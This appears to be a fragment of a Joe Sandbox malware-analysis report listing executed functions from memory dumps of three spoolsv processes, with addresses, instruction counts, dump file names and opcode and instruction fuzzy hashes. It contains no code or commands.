                                                                                                                                                                                                                                                        Executed Functions

                                                                                                                                                                                                                                                        Function 00007FFAAC591739 Relevance: .8, Instructions: 801COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000017.00000002.2038754880.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_23_2_7ffaac590000_spoolsv.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 89ca5e492fb9522bd896e124cb060d13247541403f1e97739c1553707dac8fec
                                                                                                                                                                                                                                                        • Instruction ID: c4f848c3191c851215ac5c087f6b0486d1dc1b1a2db4c88a63cf6eeaddbd7f81
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 89ca5e492fb9522bd896e124cb060d13247541403f1e97739c1553707dac8fec
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C742E861B5CA1A8FFB58F778C459679B6D6FF99300F5085B9F00EC3296CE2CA8058781
                                                                                                                                                                                                                                                        Function 00007FFAAC592161 Relevance: .2, Instructions: 210COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000017.00000002.2038754880.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_23_2_7ffaac590000_spoolsv.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 28021e1b6e23c2a1e1093e3c7e0ed5f8315b7ebc7dc29884db80de94e8faa809
                                                                                                                                                                                                                                                        • Instruction ID: c06932db25f02db0a38d7561b26ca6d23b981e9f3e9b4188ff7923fe9d17ec2c
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 28021e1b6e23c2a1e1093e3c7e0ed5f8315b7ebc7dc29884db80de94e8faa809
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 84512351A5E6C64FE786A7789864675BFE8EF47215B1804FBE0CDC71A3DD0C480AC382
                                                                                                                                                                                                                                                        Function 00007FFAAC590705 Relevance: .2, Instructions: 242COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000017.00000002.2038754880.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_23_2_7ffaac590000_spoolsv.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 5d6c922623a0d798c34a446a5972c28d852e9adcfc93c79bbff7d786dbba1a6b
                                                                                                                                                                                                                                                        • Instruction ID: 995201d2239fafbef42c94dd2ce82d33848a03c6f6be4328eca0fd4edd76433e
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5d6c922623a0d798c34a446a5972c28d852e9adcfc93c79bbff7d786dbba1a6b
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0F814E62A4D6C68FE345E7A888A54F87FD1EF96314B58C4FAE089C7297CC189809C7D1
                                                                                                                                                                                                                                                        Function 00007FFAAC590EAE Relevance: .2, Instructions: 204COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000017.00000002.2038754880.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_23_2_7ffaac590000_spoolsv.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: d356a24fcfbe5742e7649332648f46e32b21c72c0e4fcef7962383c13bac2bca
                                                                                                                                                                                                                                                        • Instruction ID: 7e8a31fce6c4b067586603cd31134dde41c75512ab3fc816dc4bca7949bae2da
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d356a24fcfbe5742e7649332648f46e32b21c72c0e4fcef7962383c13bac2bca
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 48513962A0D7864FE356A37CD8655B53FD5EF8B22070984FBE08DC71A3DC1C98468392
                                                                                                                                                                                                                                                        Function 00007FFAAC590650 Relevance: .1, Instructions: 137COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000017.00000002.2038754880.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_23_2_7ffaac590000_spoolsv.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 81af490fe4118dc11d1cb73b666cd5ff9ec7985bfe14518b1937127af4ab6942
                                                                                                                                                                                                                                                        • Instruction ID: 70340ada4b0ce32696f5a25df4edcff64b6b4f40eb097f6998c91831ffb26b88
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 81af490fe4118dc11d1cb73b666cd5ff9ec7985bfe14518b1937127af4ab6942
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0031B662B189490FEB98F73CD46A679B6C6EB9D315F0445BEF04EC3293DD589C428381
                                                                                                                                                                                                                                                        Function 00007FFAAC590D41 Relevance: .1, Instructions: 130COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000017.00000002.2038754880.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_23_2_7ffaac590000_spoolsv.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: ade52cb6c7eb98342fcbe527038e6fe367160eb74979596931cfe4af9d9cd439
                                                                                                                                                                                                                                                        • Instruction ID: 5400ba3d9e8a8de411a78115247e4e6f138ab1b8a140b1d460013f36351e0603
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ade52cb6c7eb98342fcbe527038e6fe367160eb74979596931cfe4af9d9cd439
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4D31C2A2B18A4A5FE784B7BC981A7B976D5EF9D311F0485BAE00DC3292DD2C98024381
                                                                                                                                                                                                                                                        Function 00007FFAAC590BFB Relevance: .1, Instructions: 116COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000017.00000002.2038754880.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_23_2_7ffaac590000_spoolsv.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 3de2f5ae32a5389005f76ec0f72d22251dd1da5781f1d79ee860aaf298c22960
                                                                                                                                                                                                                                                        • Instruction ID: 23564f26ea21d3ccebe6aefc6655466ed2ea0ed5e66342db48dd6a50cf69c331
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3de2f5ae32a5389005f76ec0f72d22251dd1da5781f1d79ee860aaf298c22960
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: DE31A971A18A0E8FEB44E7B8C4556EDBBE5FF98300F508574E00AD3286CD39A845C791
                                                                                                                                                                                                                                                        Function 00007FFAAC590870 Relevance: .1, Instructions: 86COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000017.00000002.2038754880.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_23_2_7ffaac590000_spoolsv.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 2d80aa67b2f62d7c3fc316ce01afb13c9565e4a7e3e90702131e3af3df8b2481
                                                                                                                                                                                                                                                        • Instruction ID: 833cdf5d93279bb58fb2de278de5f606c3108d9d6ccc387cbe92f53dc02f31ba
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2d80aa67b2f62d7c3fc316ce01afb13c9565e4a7e3e90702131e3af3df8b2481
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6131C56064C64D9FD788F768C4E48B97FB2AF99304BE1C4B5E40AD739BCD28580987A1
                                                                                                                                                                                                                                                        Function 00007FFAAC591652 Relevance: .1, Instructions: 69COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000017.00000002.2038754880.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_23_2_7ffaac590000_spoolsv.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 16eb0e5b843980802c5228b9df22600aeaeed67108e8b7df8b26fc44f01b30f0
                                                                                                                                                                                                                                                        • Instruction ID: 7335a96a3ba7253501d7ff03f73fbc38aef90f4c7274b88680ff52e00edd8fb4
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 16eb0e5b843980802c5228b9df22600aeaeed67108e8b7df8b26fc44f01b30f0
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B211AF61E5491F8BEB44E7ACC8965FEBBB1FF88350F908175E00FE2596CE29280647C0
                                                                                                                                                                                                                                                        Function 00007FFAAC592331 Relevance: .0, Instructions: 47COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000017.00000002.2038754880.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_23_2_7ffaac590000_spoolsv.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 6379349f089a8ad5a22797257303e96befc54c94845dcf82a32d7f94399d7e00
                                                                                                                                                                                                                                                        • Instruction ID: 4af44823645f840c09499d349a9c289c0879f31ab6c89ebe2b24760cc327708c
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6379349f089a8ad5a22797257303e96befc54c94845dcf82a32d7f94399d7e00
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D401470194E7938FF74967284C91475BFE8DB97341B1444FAF4CDCA1A3D80CA94983C2

                                                                                                                                                                                                                                                        Executed Functions

                                                                                                                                                                                                                                                        Function 00007FFAAC581739 Relevance: .8, Instructions: 801COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000018.00000002.2121305123.00007FFAAC580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC580000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_24_2_7ffaac580000_spoolsv.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 5fd8cffc9c219c4bbd7e89ed83784541b86bdb8a9f5ea4cc47f57343d5e2250d
                                                                                                                                                                                                                                                        • Instruction ID: 58fc2d9019e295c438d2e82f3c355e5ce9cd345b5a337c9df336f898277213ca
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5fd8cffc9c219c4bbd7e89ed83784541b86bdb8a9f5ea4cc47f57343d5e2250d
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5242A762B6DA4A8FF754FB38C469779B6D6FF99300F448579E00EC3292DD28A8058781
                                                                                                                                                                                                                                                        Function 00007FFAAC582161 Relevance: .2, Instructions: 210COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000018.00000002.2121305123.00007FFAAC580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC580000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_24_2_7ffaac580000_spoolsv.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: ffb00f6f4289f32c3a0273e92240a5147663c0f529946e59c5f8cf8429dc3abf
                                                                                                                                                                                                                                                        • Instruction ID: a4babcfe7cdfa04a0138291dd6082ddda64380223bb17fadef96762ffb9159ed
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ffb00f6f4289f32c3a0273e92240a5147663c0f529946e59c5f8cf8429dc3abf
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C1513351A5E6C64FE786A7788864675BFD8EF97215F1804FBE0CDC71A3DD084806C382
                                                                                                                                                                                                                                                        Function 00007FFAAC580705 Relevance: .2, Instructions: 242COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000018.00000002.2121305123.00007FFAAC580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC580000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_24_2_7ffaac580000_spoolsv.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 49984568c1a00b885ca426a84584cf4228536c4bbba05ba482b1039c404242aa
                                                                                                                                                                                                                                                        • Instruction ID: 2d8e569239ece92caddc2ea562d3f6652c29386dabf432cbf0fafc72780bc820
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 49984568c1a00b885ca426a84584cf4228536c4bbba05ba482b1039c404242aa
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7F811A73A4E6868FE745DB6898655F87FA1EF85300F48C0BFD189CB297CD2499098BC1
                                                                                                                                                                                                                                                        Function 00007FFAAC580EAE Relevance: .2, Instructions: 204COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000018.00000002.2121305123.00007FFAAC580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC580000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_24_2_7ffaac580000_spoolsv.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 09c9d9a64d4de4f5403cf38bd144eb1491f703a66a5d595af1b2899301b09bcb
                                                                                                                                                                                                                                                        • Instruction ID: 05e7898177e53b42e85f845fa1e87074edd363240603106f8114cf1a183e3477
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 09c9d9a64d4de4f5403cf38bd144eb1491f703a66a5d595af1b2899301b09bcb
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2E512862A4D6C64FE356A73CD8665B53FD5EF87220B0984FBE08DC71A3DC189C468391
                                                                                                                                                                                                                                                        Function 00007FFAAC580650 Relevance: .1, Instructions: 137COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000018.00000002.2121305123.00007FFAAC580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC580000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_24_2_7ffaac580000_spoolsv.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 71feaa22adc50e183f8fb3174755b517297849d8fba18ae455a1aa5d892179e6
                                                                                                                                                                                                                                                        • Instruction ID: 9580dd398a040dd6e7f3b31d79a15d410b07785c3c92188baece2e1b1d35f2ba
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 71feaa22adc50e183f8fb3174755b517297849d8fba18ae455a1aa5d892179e6
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5B31B562B189490FE788F73CD46A679B6C6EB99311F0445BAE04EC3293DD649C428381
                                                                                                                                                                                                                                                        Function 00007FFAAC580D41 Relevance: .1, Instructions: 130COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000018.00000002.2121305123.00007FFAAC580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC580000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_24_2_7ffaac580000_spoolsv.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: f33e01ddbbea89eb5b70f4ad358b056a9a2f8a087e25f122a7d62510dea547a0
                                                                                                                                                                                                                                                        • Instruction ID: 9e9309ff00446e94e8ba496c06e4e6e6d922bc77f71575e28a79fea41d9d3626
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f33e01ddbbea89eb5b70f4ad358b056a9a2f8a087e25f122a7d62510dea547a0
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F331E562B1DA0A4FF784B7BC981A7BD77D5EFD9311F0482B6E00DC3292DD2898458391
                                                                                                                                                                                                                                                        Function 00007FFAAC580BFB Relevance: .1, Instructions: 116COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000018.00000002.2121305123.00007FFAAC580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC580000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_24_2_7ffaac580000_spoolsv.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 93e3e6bfd0a83ca1286c20679352f34aefb51c5d7be2c93c921634133623ef80
                                                                                                                                                                                                                                                        • Instruction ID: 53ece4eb6ee07f0fe171b48b5684ab34ff821d6431b793081cfac7194ecf6b00
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 93e3e6bfd0a83ca1286c20679352f34aefb51c5d7be2c93c921634133623ef80
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0A31A9B2A5890E8FEB44EB78C455AFDBBE5FF98300F508578D109D3292DD38A9458780
                                                                                                                                                                                                                                                        Function 00007FFAAC580870 Relevance: .1, Instructions: 86COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000018.00000002.2121305123.00007FFAAC580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC580000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_24_2_7ffaac580000_spoolsv.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 869d5fb3a1a257478c49e5b05c91baad5c3a77e9d2f770ee27c9c5861d2f5b62
                                                                                                                                                                                                                                                        • Instruction ID: f8a37c0e7cb62b274f2765599c779a710ee41b605ad19eb0b4ecef823e8ee48f
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 869d5fb3a1a257478c49e5b05c91baad5c3a77e9d2f770ee27c9c5861d2f5b62
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7F31A86369D6894FD745EB38D4A5CA97FB1EF85300F81C4B9D209C73ABCD245D058B82
                                                                                                                                                                                                                                                        Function 00007FFAAC581652 Relevance: .1, Instructions: 69COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000018.00000002.2121305123.00007FFAAC580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC580000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_24_2_7ffaac580000_spoolsv.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: b24a24b060989844cbb8f6bbe52468523d65fcc40555a58a57131b4041a39084
                                                                                                                                                                                                                                                        • Instruction ID: b35e6aece0f116c5aa44f552f910e066038f56cd3ad2597026164fcdfd189274
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b24a24b060989844cbb8f6bbe52468523d65fcc40555a58a57131b4041a39084
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0D11A262E6490B8BEB44E79CD8555FEBBB1FF84310F408139E10EE25A6CE245D4A47C0
                                                                                                                                                                                                                                                        Function 00007FFAAC582331 Relevance: .0, Instructions: 47COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000018.00000002.2121305123.00007FFAAC580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC580000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_24_2_7ffaac580000_spoolsv.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 1ea3cd3636a64e0e500bc3b6c9c3cc7b7bac23854137b885b83d2c23506b570e
                                                                                                                                                                                                                                                        • Instruction ID: d71a3ef6c162c7a6c155f9c3d0e4110b1dd73d5e28d7bcc4dcd4081684b34cfc
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1ea3cd3636a64e0e500bc3b6c9c3cc7b7bac23854137b885b83d2c23506b570e
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2201474194E7978FF74A67285CA14767FE8DFA6340F0444BAF5CDCA0A3DC08AA4993C2

                                                                                                                                                                                                                                                        Executed Functions

                                                                                                                                                                                                                                                        Function 00007FFAAC5A1739 Relevance: .8, Instructions: 798COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000019.00000002.2380907749.00007FFAAC5A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5A0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_25_2_7ffaac5a0000_spoolsv.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: b6d8839f894dca0040cde7221301d661ca63aca85c6e5cd52b09ee509f19deb3
                                                                                                                                                                                                                                                        • Instruction ID: 189d6bbbe93263c530d7364765e1efaeba18dcee297c53e64f943b3553322ffc
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b6d8839f894dca0040cde7221301d661ca63aca85c6e5cd52b09ee509f19deb3
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0242B561B6DA4A8FF798EB3CC459A7977D6FF99700F44857DE00EC3292DD28A8058381
                                                                                                                                                                                                                                                        Function 00007FFAAC5A0EAE Relevance: .2, Instructions: 207COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000019.00000002.2380907749.00007FFAAC5A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5A0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_25_2_7ffaac5a0000_spoolsv.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: bddca2c5d43bad45a5c497ec5577ebd4a5255ab14f0866034f5c16cb3e4007a0
                                                                                                                                                                                                                                                        • Instruction ID: c7ebae93c9041f72869e22d903fab7799b4b9118da483da46112332fbdcfb0c3
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: bddca2c5d43bad45a5c497ec5577ebd4a5255ab14f0866034f5c16cb3e4007a0
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: EC512962A5D6C64FE356A33CD8295B53FD5EF8762070941FBE08DC71A3DC1C98468391
                                                                                                                                                                                                                                                        Function 00007FFAAC5A2161 Relevance: .2, Instructions: 207COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000019.00000002.2380907749.00007FFAAC5A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5A0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_25_2_7ffaac5a0000_spoolsv.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 12470fa84c1b6f87b0f37ae7c552f01895ee74553edf7666332fc8c160818ed1
                                                                                                                                                                                                                                                        • Instruction ID: 7a1ffba9727628d2630879b9bae196af38a8d892711d0b64540c1c1b27c1d0c0
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 12470fa84c1b6f87b0f37ae7c552f01895ee74553edf7666332fc8c160818ed1
